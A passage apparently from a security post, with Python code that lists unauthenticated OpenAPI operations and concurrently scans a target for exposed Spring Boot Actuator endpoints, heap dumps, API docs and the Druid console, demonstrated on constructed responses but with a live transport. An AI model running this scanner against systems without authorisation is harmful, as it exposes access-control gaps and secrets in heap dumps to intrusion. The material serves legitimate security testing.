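    document_secured = bool(spec.get("security"))
    operations = []
    for path, item in spec.get("paths", {}).items():
        for method in METHODS:
            op = item.get(method)
            if op is None:
                continue
            secured = bool(op["security"]) if "security" in op else document_secured
            operations.append((method.upper(), base + path, secured))
    return operations


def unauthenticated(spec):
    """(METHOD, path) pairs the document itself says need no credentials."""
    return [(m, p) for m, p, secured in enumerate_operations(spec) if not secured]


def scan_targets(spec, sample="1"):
    """Concrete paths for a scanner: {id}-style templates filled with a sample value, de-duplicated."""
    seen, out = set(), []
    for _, path, _ in enumerate_operations(spec):
        concrete = re.sub(r"\{[^}]+\}", sample, path)
        if concrete not in seen:
            seen.add(concrete)
            out.append(concrete)
    return out


SWAGGER2 = {   # constructed /v2/api-docs
    "swagger": "2.0", "basePath": "/api",
    "securityDefinitions": {"api_key": {"type": "apiKey", "name": "X-Token", "in": "header"}},
    "paths": {
        "/users/{id}": {"get": {"security": [{"api_key": []}]},
                        "delete": {"security": [{"api_key": []}]}},
        "/admin/export": {"get": {"summary": "dump all users"}},      # nothing declared at all
        "/login": {"post": {"security": []}},
    },
}
OPENAPI3 = {   # constructed /v3/api-docs
    "openapi": "3.0.1", "servers": [{"url": "https://app.example/svc"}],
    "security": [{"bearer": []}],                                     # document-wide default
    "paths": {
        "/orders/{orderId}": {"get": {}, "put": {}},
        "/internal/config": {"get": {"security": []}},                # explicitly opts out
    },
}

if __name__ == "__main__":
    for spec in (SWAGGER2, OPENAPI3):
        for method, path, secured in enumerate_operations(spec):
            print(f"{'auth ' if secured else 'OPEN '} {method:6} {path}")
```

Feed scan_targets to the path scanner with an unauthenticated session and compare the responses against the secured/open labels: a 200 on an operation the document marks as secured is the access-control bug, a 200 on one it marks open is information the developers meant to publish but may not have meant to expose to everyone.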
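The path list above is only half of a scan; the other half is telling a real hit from a catch-all 200. The scanner below is an added example, not the post's tool: it normalises the list (fills the {name}/(name) placeholders, de-duplicates), probes the paths concurrently, and labels responses by evidence rather than status alone, using the Actuator content type, the HPROF magic bytes of a heap dump, and the swagger/openapi keys of an API document. The fetch function is injectable, so the run shown uses constructed responses; the target URL is an assumption, and urllib_fetch is the transport for a live host.

```python
"""Probe the path list above against one target and fingerprint what answers.
Added example, not the post's tool. fetch(url) -> (status, headers, body) is
injectable, so the run below uses constructed responses; for a live target
pass urllib_fetch. The base URL is an assumption.
"""
import re
from concurrent.futures import ThreadPoolExecutor
from urllib import error as urlerror, request as urlrequest

ACTUATOR_TYPE = "application/vnd.spring-boot.actuator"   # .v1+json / .v2+json / .v3+json
HPROF_MAGIC = b"JAVA PROFILE"


def normalise(paths):
    """Strip, fill {name}/(name) placeholders with a property every JVM has, de-duplicate."""
    seen, out = set(), []
    for raw in paths:
        path = re.sub(r"[{(]name[})]", "java.home", raw.strip())
        if path and path not in seen:
            seen.add(path)
            out.append(path)
    return out


def classify(path, status, headers, body):
    """Label a response by what it reveals; None means nothing interesting."""
    content_type = headers.get("content-type", "").lower()
    if status in (401, 403):
        return "auth-required"
    if status != 200:
        return None
    if body.startswith(HPROF_MAGIC):
        return "heapdump"
    if ACTUATOR_TYPE in content_type:
        return "actuator"
    head = body[:4096].lower()
    if b'"swagger"' in head or b'"openapi"' in head or b"swagger-ui" in head:
        return "openapi"
    if "/druid/" in path and (b"druid" in head or b'"resultcode"' in head):
        return "druid-console"
    return "http-200"


def scan(base_url, paths, fetch, workers=8):
    """Return {path: label} for every path that answered with something worth a look."""
    def probe(path):
        try:
            status, headers, body = fetch(base_url + path)
        except Exception:              # connection errors, timeouts: skip the path
            return path, None
        return path, classify(path, status, headers, body)

    with ThreadPoolExecutor(max_workers=workers) as pool:
        return {p: label for p, label in pool.map(probe, normalise(paths)) if label}


def urllib_fetch(url, timeout=8):
    """Live transport; only the first 64 KiB are read so heap dumps do not stall the scan."""
    req = urlrequest.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urlrequest.urlopen(req, timeout=timeout) as resp:
            return resp.status, {k.lower(): v for k, v in resp.headers.items()}, resp.read(65536)
    except urlerror.HTTPError as err:
        return err.code, {k.lower(): v for k, v in err.headers.items()}, err.read(65536)


# Constructed responses standing in for a Spring Boot 2.x target at http://target:8080.
FAKE_RESPONSES = {
    "/actuator/health": (200, {"content-type": "application/vnd.spring-boot.actuator.v3+json"}, b'{"status":"UP"}'),
    "/actuator/env/java.home": (200, {"content-type": "application/vnd.spring-boot.actuator.v3+json"},
                                b'{"property":{"value":"/usr/lib/jvm"}}'),
    "/actuator/heapdump": (200, {"content-type": "application/octet-stream"}, b"JAVA PROFILE 1.0.2\x00\x00\x00\x00\x08"),
    "/actuator/shutdown": (401, {}, b""),
    "/v2/api-docs": (200, {"content-type": "application/json"}, b'{"swagger":"2.0","paths":{}}'),
    "/druid/login.html": (200, {"content-type": "text/html"}, b"<title>Druid Stat Index</title>"),
}


def fake_fetch(url):
    return FAKE_RESPONSES.get(url[len("http://target:8080"):], (404, {}, b""))


SAMPLE_PATHS = ["/actuator/health", "/actuator/env/{name}", "/actuator/heapdump", "/actuator/shutdown",
                "/v2/api-docs", "/druid/login.html", "/env", "/env", "/beans"]

if __name__ == "__main__":
    for path, label in sorted(scan("http://target:8080", SAMPLE_PATHS, fake_fetch).items()):
        print(f"{label:14} {path}")
```

Run the whole list above through scan with urllib_fetch and the real base URL; a 401/403 on /actuator/* is still worth noting, because it confirms Actuator is present and only the exposure or authentication layer stands in the way.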